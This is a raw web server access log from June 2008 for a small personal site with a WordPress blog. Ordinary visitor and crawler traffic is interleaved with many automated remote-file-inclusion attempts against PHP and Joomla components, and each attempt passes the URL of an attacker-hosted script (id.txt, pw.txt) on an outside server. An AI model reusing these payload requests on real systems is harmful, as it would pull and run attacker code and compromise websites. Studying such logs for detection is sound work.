64.118.88.84 - - [11/Jun/2008:13:04:17 -0700] "GET /logs/access_080429.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:13:04:21 -0700] "GET /logs/access_071230.log/home.php?pag=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:04:23 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:04:23 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.31.0.10 - - [11/Jun/2008:13:04:29 -0700] "GET /logs/access_080301.log HTTP/1.1" 200 262144 "http://cnn-news-usa.info/encapscms_path-core-core-php.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:04:40 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:04:41 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:04:41 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:04:45 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:05:04 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:05:05 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:05:05 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
216.127.70.91 - - [11/Jun/2008:13:05:18 -0700] "GET /logs/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.127.70.91 - - [11/Jun/2008:13:05:19 -0700] "GET /home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.160.238.180 - - [11/Jun/2008:13:05:19 -0700] "GET / HTTP/1.1" 200 18253 "-" "Mozilla/4.0" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:20 -0700] "GET / HTTP/1.1" 200 18241 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:21 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.1" 200 9232 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:21 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.1" 200 5241 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:22 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.1" 200 4019 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:22 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.1" 200 29867 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:23 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.1" 200 8888 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:23 -0700] "GET / HTTP/1.1" 200 18241 "-" "VB Project" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:23 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.1" 200 6722 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:23 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgcolor.jpg HTTP/1.1" 200 556 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:23 -0700] "GET /blog/wp-content/themes/default/images/kubrickbgwide.jpg HTTP/1.1" 200 1014 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:24 -0700] "GET /blog/wp-content/plugins/nggallery/imagerotator.swf HTTP/1.1" 200 42010 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:24 -0700] "GET /blog/wp-content/themes/default/images/kubrickfooter.jpg HTTP/1.1" 200 2443 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:05:31 -0700] "GET /blog/wp-content/uploads/2008/04/img_1131.thumbnail.JPG HTTP/1.1" 200 3726 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
66.249.67.79 - - [11/Jun/2008:13:06:13 -0700] "GET /blog/?show=slide&pageid=159 HTTP/1.1" 200 37831 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:06:14 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:06:15 -0700] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:06:16 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:06:16 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:13:06:37 -0700] "GET /logs/access_080108.log/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:13:06:45 -0700] "GET /index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18389 "-" "libwww-perl/5.805" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:06:49 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:06:50 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:06:50 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
200.250.121.2 - - [11/Jun/2008:13:06:50 -0700] "GET /logs/index.php?seccion=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
219.94.129.31 - - [11/Jun/2008:13:07:05 -0700] "GET /logs/access_080429.log//include.php?path[docroot]=http://pwd.roietceo.net/Newsimage/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:06 -0700] "GET /blog/wp-content/uploads/2008/04/img_1120.JPG HTTP/1.1" 200 3072529 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:07:10 -0700] "GET /logs/access.log/index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:07:13 -0700] "GET /index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:07:13 -0700] "GET /logs/index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
200.25.194.154 - - [11/Jun/2008:13:07:22 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:23 -0700] "GET /blog/wp-content/uploads/2008/04/img_1132.JPG HTTP/1.1" 200 3221099 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:24 -0700] "GET /blog/wp-content/uploads/2008/04/img_1130.JPG HTTP/1.1" 200 3013085 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:27 -0700] "GET /blog/wp-content/uploads/2008/04/crestoc07-3.jpg HTTP/1.1" 200 51084 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:28 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/loadingAnimationv3.gif HTTP/1.1" 200 5886 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:29 -0700] "GET /blog/wp-content/themes/default/images/kubrickheader.jpg HTTP/1.1" 200 7868 "http://dmulk.com/blog/wp-content/themes/default/style.css" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
86.58.154.237 - - [11/Jun/2008:13:07:29 -0700] "GET /logs/access_080215.log/////?mosConfig_absolute_path=http://www.linuxmaniacrew.altervista.org/feeee/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:30 -0700] "GET / HTTP/1.1" 200 18257 "-" "VB Project" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:31 -0700] "GET /blog/wp-content/uploads/2008/04/img_1124.JPG HTTP/1.1" 200 3820844 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:07:33 -0700] "GET //components/com_mtree/Savant2/Savant2_Plugin_textarea.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:34 -0700] "GET /blog/wp-content/uploads/2008/04/img_1129.JPG HTTP/1.1" 200 3839261 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
86.58.154.237 - - [11/Jun/2008:13:07:38 -0700] "GET /logs/access.log/////?mosConfig_absolute_path=http://www.linuxmaniacrew.altervista.org/feeee/text.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:43 -0700] "GET /blog/wp-content/uploads/2008/04/img_1136.JPG HTTP/1.1" 200 4254533 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:51 -0700] "GET /blog/wp-content/uploads/2008/04/img_1123.JPG HTTP/1.1" 200 4659669 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:07:54 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:07:59 -0700] "GET / HTTP/1.1" 200 18257 "-" "VB Project" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:08:05 -0700] "GET /blog/wp-content/uploads/2008/04/img_1133.JPG HTTP/1.1" 200 5288628 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:08:05 -0700] "GET / HTTP/1.1" 200 18257 "-" "VB Project" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:08:07 -0700] "GET /blog/wp-content/uploads/2008/04/img_1135.JPG HTTP/1.1" 200 3097783 "http://www.dmulk.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "dmulk.com"
89.108.66.182 - - [11/Jun/2008:13:08:08 -0700] "GET /logs/phphtml.php?htmlclass_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.66.182 - - [11/Jun/2008:13:08:08 -0700] "GET /phphtml.php?htmlclass_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:08:08 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14" "www.dmulk.com"
200.25.194.154 - - [11/Jun/2008:13:08:11 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
24.121.44.88 - - [11/Jun/2008:13:08:17 -0700] "GET / HTTP/1.1" 200 18257 "-" "VB Project" "www.dmulk.com"
200.172.95.59 - - [11/Jun/2008:13:08:18 -0700] "GET /logs/access_080223.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:08:19 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
202.221.143.111 - - [11/Jun/2008:13:08:25 -0700] "GET /logs/access_080228.log/joomla/index.php?option=com_restaurante&task=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:08:43 -0700] "GET /logs/access.log/index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:08:45 -0700] "GET /index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:08:45 -0700] "GET /logs/index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:08:51 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:08:51 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:08:51 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:09:09 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:09:26 -0700] "GET /logs/access.log/index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:09:28 -0700] "GET /index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18379 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:09:28 -0700] "GET /logs/index.php?go=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:09:29 -0700] "GET /logs/index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:09:31 -0700] "GET /index.php?redir=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 200 18385 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:09:32 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:09:34 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:09:34 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:13:09:50 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.118.88.84 - - [11/Jun/2008:13:09:50 -0700] "GET /logs/access_080117.log/modules/My_eGallery/index.php?basepath=http://www.reskate.net/chicas/albums/album44/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
160.99.12.231 - - [11/Jun/2008:13:09:50 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:09:57 -0700] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.2.100.138 - - [11/Jun/2008:13:10:10 -0700] "GET /logs/access_080215.log//modules/vwar/admin/admin.php?vwar_root=http://www.teamamd.com/Downloads/AAO/Patch/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:10:21 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:10:21 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:10:21 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:10:23 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:10:23 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:10:23 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
211.239.161.10 - - [11/Jun/2008:13:10:27 -0700] "GET /logs/access_080305.log//errors.php?error=http://1800autoauction.com/logs/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:10:33 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.230.197.245 - - [11/Jun/2008:13:10:33 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:10:38 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:10:38 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:10:38 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.222.34 - - [11/Jun/2008:13:10:48 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.114.58 - - [11/Jun/2008:13:10:57 -0700] "GET /logs/access_080501.log/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
203.200.89.107 - - [11/Jun/2008:13:11:07 -0700] "GET /logs/access_080429.log//lostpasswd.php?env[include_prefix]=http://www.bglradio.net//WebCalendar/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:11:30 -0700] "GET /logs/access_080501.log/home.php?pagina=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:11:35 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.80.245.245 - - [11/Jun/2008:13:11:36 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://www.lernservicecenter.de/lsc/administrator/components/com_css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.118.242 - - [11/Jun/2008:13:11:38 -0700] "GET //components/com_calendar.php?absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:11:47 -0700] "GET /logs/access_080312.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:11:47 -0700] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:11:47 -0700] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:13:11:47 -0700] "GET /logs//include.php?path[docroot]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
206.221.179.200 - - [11/Jun/2008:13:11:47 -0700] "GET //include.php?path[docroot]=http://www.cdpm3.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.89.25.154 - - [11/Jun/2008:13:12:12 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://alb1.freehostia.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
